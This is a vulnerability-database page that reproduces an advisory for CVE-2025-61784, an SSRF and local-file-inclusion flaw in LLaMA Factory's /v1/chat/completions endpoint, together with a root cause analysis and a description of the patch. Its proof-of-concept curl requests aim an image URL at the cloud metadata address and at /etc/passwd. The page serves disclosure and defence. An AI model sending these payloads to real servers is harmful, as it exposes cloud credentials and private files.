7.6

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-61784

CVE-2025-61784: LLaMA Factory's Chat API Contains Critical SSRF and LFI Vulnerabilities

Summary

A Server-Side Request Forgery (SSRF) vulnerability in the chat API allows any authenticated user to force the server to make arbitrary HTTP requests to internal and external networks. This can lead to the exposure of sensitive internal services, reconnaissance of the internal network, or interaction with third-party services. The same mechanism also allows for a Local File Inclusion (LFI) vulnerability, enabling users to read arbitrary files from the server's filesystem.

Details

The vulnerability exists in the _process_request function within src/llamafactory/api/chat.py. This function is responsible for processing incoming multimodal content, including images, videos, and audio provided via URLs.

The function checks if the provided URL is a base64 data URI or a local file path (os.path.isfile). If neither is true, it falls back to treating the URL as a web URI and makes a direct HTTP GET request using requests.get(url, stream=True).raw without any validation or sanitization of the URL.

Vulnerable Code Snippets in _process_request:

# ...
        elif input_item.type == "image_url":
            # ...
            else:  # web uri
                image_stream = requests.get(image_url, stream=True).raw
# ...
        elif input_item.type == "video_url":
            # ...
            else:  # web uri
                video_stream = requests.get(video_url, stream=True).raw
# ...
        elif input_item.type == "audio_url":
            # ...
            else:  # web uri
                audio_stream = requests.get(audio_url, stream=True).raw
# ...

This vulnerable function is called by create_chat_completion_response and create_stream_chat_completion_response, which are in turn called by the public-facing /v1/chat/completions API endpoint in src/llamafactory/api/app.py. A user can craft a request to this endpoint containing a malicious URL in the messages payload to trigger the vulnerability.

PoC

To reproduce the vulnerability, send a POST request to the /v1/chat/completions endpoint with a JSON payload containing a URL that points to an internal or controlled external service. Start the LLaMA Factory API server. Use curl to send the malicious request. The following example uses a URL pointing to the AWS metadata service, a common SSRF attack vector.

SSRF Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "http://169.254.169.254/latest/meta-data/"
          }
        }
      ]
    }
  ]
}'

LFI Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "/etc/passwd"
          }
        }
      ]
    }
  ]
}'

The server will make a request to the specified URL or read the specified local file.

Impact

Vulnerability Type: Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI).

Impacted Component: The API server, specifically the /v1/chat/completions endpoint.

Who is impacted: Any user who can send requests to the chat API. The vulnerability allows an attacker to bypass firewalls and access internal network resources, query cloud metadata services for credentials, or read sensitive files on the server. The severity is critical.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-61784

CVE-2025-61784:

7.6

CVSS Score

3.1

-

CVSS Score

Basic Information

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
llamafactory	pip	<= 0.9.3

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The analysis of the security advisory and the associated commit 95b7188090a1018935c9dc072bfc97f24f1c96e9 confirms that the root cause of the vulnerability is in the _process_request function located in src/llamafactory/api/chat.py. This function is responsible for handling multimodal inputs, including URLs for images, videos, and audio.

The vulnerability arises because the function fails to sanitize or validate the URLs provided by the user before using them in sensitive operations. Specifically:

LFI: When a provided URL is identified as a local file path via os.path.isfile, the function proceeds to open it. This allows an attacker to submit a path to any readable file on the server (e.g., /etc/passwd), which will then be opened and processed.
SSRF: If the URL is not a local file or a data URI, the function assumes it is a web URI and makes a direct HTTP GET request to it using the requests library. This allows an attacker to force the server to make requests to internal network resources or cloud metadata services (e.g., http://169.254.169.254/latest/meta-data/), exposing sensitive information.

The patch addresses these issues by introducing two new validation functions, check_lfi_path and check_ssrf_url, which are called immediately before the file opening and HTTP request operations, respectively. These functions are designed to restrict file access to a safe directory and to prevent requests to private or reserved IP addresses.

During exploitation, a profiler would show the _process_request function in the stack trace, as it is the function that directly handles the malicious input. The vulnerability description also indicates that this function is called by create_chat_completion_response and create_stream_chat_completion_response, which are the handlers for the public /v1/chat/completions API endpoint. Therefore, _process_request is the primary vulnerable function where the security flaw exists.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

7.6

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-61784: LLaMA Factory's Chat API Contains Critical SSRF and LFI Vulnerabilities

Summary

Details

PoC

Impact

CVE-2025-61784:

7.6

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

7.6

7.6

CVE-2025-61784: LLaMA Factory's Chat API Contains Critical SSRF and LFI Vulnerabilities

Summary

Details

PoC

Impact

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI